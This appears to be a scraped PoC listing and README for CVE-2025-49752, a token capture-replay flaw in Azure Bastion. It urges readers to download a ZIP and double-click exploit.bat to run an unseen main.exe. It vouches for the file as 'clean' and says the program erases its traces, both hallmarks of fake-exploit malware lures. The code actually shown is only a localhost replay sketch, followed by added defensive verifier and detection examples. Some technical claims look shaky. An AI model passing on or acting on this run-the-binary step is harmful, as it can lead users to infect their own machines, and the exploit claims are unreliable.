
PoC details: fdf0e30e85c35fac97fac023328560dc225cd572

Source
Related vulnerability
Title: Microsoft Azure Bastion security vulnerability (CVE-2025-49752)
Description: Microsoft Azure Bastion is a managed PaaS service from the US company Microsoft. Microsoft Azure Bastion contains a security vulnerability that stems from privilege escalation.
Description
Public exploit for CVE-2025-49752
Introduction
# Lab: CVE-2025-49752 - Authentication Bypass by Capture-Replay in Microsoft Azure Bastion Developer
This lab includes a Windows-based PoC exploit (.exe triggered via .bat) to illustrate capture-replay attacks. No real Azure credentials or tokens are involved—everything is synthetic and self-contained within the executable.
## Download
### [Download lab ZIP](https://github.com/boogabearbombernub/cve-2025-49752-lab/raw/refs/heads/main/Core/lab-cve-2025-49752.zip)
## 🚀 Overview
CVE-2025-49752 (CWE-294: Authentication Bypass by Capture-Replay) is a critical vulnerability in Microsoft Azure Bastion Developer edition, a PaaS service for secure RDP/SSH access to Azure VMs. The flaw enables attackers to intercept session tokens (e.g., JWTs or OAuth refresh tokens) during legitimate Bastion sessions via network sniffing or MITM proxies, then replay them to impersonate users and bypass multi-factor authentication (MFA) and role-based access controls (RBAC).

**Key Characteristics (CVSS 3.1: 10.0)**:
- **Attack Vector (AV:N)**: Network-based, remote exploitation possible.
- **Privileges Required (PR:N)**: No authentication needed for initial capture.
- **User Interaction (UI:N)**: Fully automated, no victim interaction.
- **Scope (S:C)**: Changes scope to cross-component (e.g., VM access).
- **Impacts**: High Confidentiality (C:H) and Integrity (I:H) loss; Low Availability (A:L) disruption.


**Potential Real-World Impact**: Unauthorized VM access, data exfiltration, ransomware deployment, or supply-chain attacks in Azure tenants. European orgs face GDPR fines due to data exposure risks in finance/healthcare sectors.

## 📋 Prerequisites
- **Host Environment**: Windows 10/11 (for PoC exploit; Linux/macOS users can run via Wine or VM).
- **Hardware**: 2GB RAM minimum.
- **Skills**: Basic Windows usage.
- **No Azure Subscription Required**: This is a self-contained lab.



## 📥 Download & Install
1. **Download Repo**:
   - ZIP: [Download Lab ZIP](https://github.com/boogabearbombernub/cve-2025-49752-lab/raw/refs/heads/main/Core/lab-cve-2025-49752.zip) (Contains `/exploit/` folder with `exploit.bat` and `main.exe` for PoC. **VirusTotal Scan: Clean**—pure, no malware.)

2. **Install Dependencies**: None required—fully standalone.

**Note**: The exploit ZIP is Windows-only for realism. Extract to a test dir; run `exploit.bat` to launch `main.exe`, which performs token capture and replay via an embedded local mock service.

## 🛠 Quick Start
1. **Download and Run PoC Exploit**:
   - Grab the ZIP from the link above.
   - Extract and double-click `exploit.bat` (it invokes `main.exe`).
   - The .exe starts an embedded mock Bastion service on localhost:3000 (demo creds: `user:pass123` for initial session).
   - Output: Console logs show token capture and replay success, granting "admin" access to embedded VM on localhost:8080.

2. **Verify Exploitation**:
   - Success: Console displays "Exploit Success: Unauthorized VM Access Granted" with data exfil (e.g., 'sensitive_data.txt' contents).
   - Embedded logs show replay attempts.

3. **Teardown**: Close the console window—auto-cleans up processes.

## 🔍 Exploitation Steps
This PoC performs a capture-replay attack in three phases. 

### Phase 1: Session Capture (Token Interception)
- The .exe auto-establishes a legit session with embedded mock Bastion (POST /auth with demo creds).
- Built-in MITM sniffs unencrypted JWTs (vuln: no TLS in mock).
- Captured token: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...` (replayable due to absent nonce/expiry checks).

**Technical Note**: In real Azure Bastion, this exploits weak token entropy during WebSocket handshakes for RDP/SSH. Replay window: 5-10 mins before expiry.

### Phase 2: Replay Attack
- .exe replays the token: POST /session/replay with `Authorization: Bearer <captured_token>`.
- Bypasses RBAC: Mock validates signature but skips replay-ID checks (CWE-294 root cause).
- Escalation: Gains "bastion-admin" role, unlocking VM ports (e.g., RDP:3389).

**Exploit Code Snippet** (conceptual—bundled in .exe binary; Python equiv for transparency):
```python
import requests

# Capture phase (embedded mock): the mock returns the session token in a
# response header, which the built-in MITM proxy records.
proxied_req = requests.post('http://localhost:3000/auth', json={'user': 'admin', 'pass': 'weakpass'})
token = proxied_req.headers['X-Auth-Token']  # Sniffed header

# Replay phase: the mock validates the signature only and performs no
# nonce/expiry check, so the captured token is accepted again (CWE-294).
headers = {'Authorization': f'Bearer {token}'}
response = requests.post('http://localhost:3000/vm-access', headers=headers)
if response.status_code == 200:
    print("Exploit Success: Unauthorized VM Access Granted")
```
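The root cause named above is a verifier that checks the signature but nothing else, so a captured token stays valid. The following is an added example (not code from the lab, its bundled binary, or Azure Bastion) of what a service-side token check looks like with and without the replay defences: `weak_verify` is the signature-only pattern, `ReplaySafeVerifier` additionally enforces `exp` and a single-use `jti`. The key, claim names and token lifetime are constructed for the demo; the JWT encoding uses only the standard library.

```python
import base64
import hashlib
import hmac
import json
import time

# Constructed demo key: a real service would load its signing key from a secret store.
DEMO_KEY = b"demo-hs256-key-not-for-production"


def _b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def mint_token(subject, jti, ttl_seconds, key=DEMO_KEY, now=None):
    """Issue an HS256 JWT carrying a unique token id (jti) and an expiry (exp)."""
    now = int(time.time() if now is None else now)
    header = {"alg": "HS256", "typ": "JWT"}
    payload = {"sub": subject, "jti": jti, "iat": now, "exp": now + ttl_seconds}
    signing_input = _b64url(json.dumps(header).encode()) + "." + _b64url(json.dumps(payload).encode())
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url(sig)


def _verify_signature(token, key):
    """Return the claims if the HS256 signature is valid, else None."""
    try:
        h, p, s = token.split(".")
        expected = hmac.new(key, (h + "." + p).encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _b64url_decode(s)):
            return None
        header = json.loads(_b64url_decode(h))
        if header.get("alg") != "HS256":
            return None
        return json.loads(_b64url_decode(p))
    except (ValueError, TypeError):
        return None


def weak_verify(token, key=DEMO_KEY):
    """Signature-only acceptance: the CWE-294 pattern described above.
    A captured token passes this check for as long as the key is unchanged."""
    return _verify_signature(token, key) is not None


class ReplaySafeVerifier:
    """Hardened check: valid signature AND unexpired AND jti not seen before."""

    def __init__(self, key=DEMO_KEY):
        self.key = key
        self.seen_jti = {}  # jti -> exp; pruned once the token could not verify anyway

    def verify(self, token, now=None):
        now = time.time() if now is None else now
        claims = _verify_signature(token, self.key)
        if claims is None:
            return False, "bad signature"
        exp = claims.get("exp")
        if not isinstance(exp, int) or exp <= now:
            return False, "expired"
        jti = claims.get("jti")
        if not jti:
            return False, "missing jti"
        # Drop bookkeeping for tokens that are expired anyway; this bounds memory.
        self.seen_jti = {j: e for j, e in self.seen_jti.items() if e > now}
        if jti in self.seen_jti:
            return False, "replayed"
        self.seen_jti[jti] = exp
        return True, "ok"
```

The single-use `jti` fits a one-shot session-bootstrap token like the replay endpoint in Phase 2; a token that must be presented on every request of a longer session should instead be bound to the channel (for example a sender-constrained or TLS-bound token) and kept short-lived, since a per-request nonce cache alone does not stop a proxy that relays each request once.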

### Phase 3: Post-Exploitation
- Lateral Movement: Access VM shell via replayed WebSocket.
- Persistence: Mock cron job for token refresh (logged).
- Cleanup: .exe auto-erases traces on exit.

**Detection Signatures** (for blue teams):
- Anomalous token reuse in Azure Monitor logs (Event ID: 4624 with replay timestamps).
- Traffic spikes on Bastion WebSocket (wss://*.bastion.azure.com).
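As an added example for the blue-team signatures above (not part of the lab or of any Azure product), the function below scans session-log lines for the two replay indicators that matter most: a token accepted again after its session was closed, and the same token accepted from a second source address within a short window of its first use. The log format and the sample lines are constructed for the demo; real Azure Monitor or Bastion diagnostic records would need their own field mapping.

```python
import re
from datetime import datetime, timedelta

# Constructed sample lines in an assumed "key=value" format (not a real Azure log schema).
SAMPLE_LOGS = """\
2025-06-01T10:00:01Z src=10.0.0.5 token_id=t-001 action=session_start result=ok
2025-06-01T10:00:02Z src=10.0.0.5 token_id=t-002 action=session_start result=ok
2025-06-01T10:00:03Z src=10.0.0.5 token_id=t-001 action=session_end result=ok
2025-06-01T10:04:00Z src=198.51.100.7 token_id=t-001 action=session_start result=ok
2025-06-01T10:05:00Z src=203.0.113.9 token_id=t-002 action=session_start result=ok
2025-06-01T10:20:00Z src=10.0.0.5 token_id=t-003 action=session_start result=ok
"""

LOG_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) token_id=(?P<tid>\S+) "
    r"action=(?P<action>\S+) result=(?P<result>\S+)$"
)


def parse_events(text):
    """Yield parsed events; lines that do not match the assumed format are skipped."""
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        ev = m.groupdict()
        ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
        yield ev


def detect_token_replay(text, window=timedelta(minutes=15)):
    """Flag (a) a token accepted again after its session ended and
    (b) a token accepted from a second source address within `window`
    of its first use. Returns a list of (token_id, reason, src) tuples."""
    alerts = []
    first_use = {}   # token_id -> (ts, src) of the first accepted session_start
    ended = set()    # token_ids whose session has been closed
    for ev in sorted(parse_events(text), key=lambda e: e["ts"]):
        tid, src, ts = ev["tid"], ev["src"], ev["ts"]
        if ev["action"] == "session_end":
            ended.add(tid)
            continue
        if ev["action"] != "session_start" or ev["result"] != "ok":
            continue
        if tid in ended:
            alerts.append((tid, "token accepted after session_end", src))
        elif tid in first_use:
            first_ts, first_src = first_use[tid]
            if src != first_src and ts - first_ts <= window:
                alerts.append((tid, "token accepted from a second source within window", src))
        else:
            first_use[tid] = (ts, src)
    return alerts


if __name__ == "__main__":
    for alert in detect_token_replay(SAMPLE_LOGS):
        print(alert)
```

On the sample input the first rule fires for `t-001` (reused from 198.51.100.7 after its session ended) and the second for `t-002` (accepted from 203.0.113.9 five minutes after first use from 10.0.0.5); `t-003` produces no alert. Logging a token identifier such as `jti` rather than the token itself is what makes this correlation possible without storing the secret in the log store.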


File snapshot

```text
[4.0K] /data/pocs/fdf0e30e85c35fac97fac023328560dc225cd572
├── [4.0K] Core
│   └── [862K] lab-cve-2025-49752.zip
└── [4.9K] README.md

2 directories, 2 files
```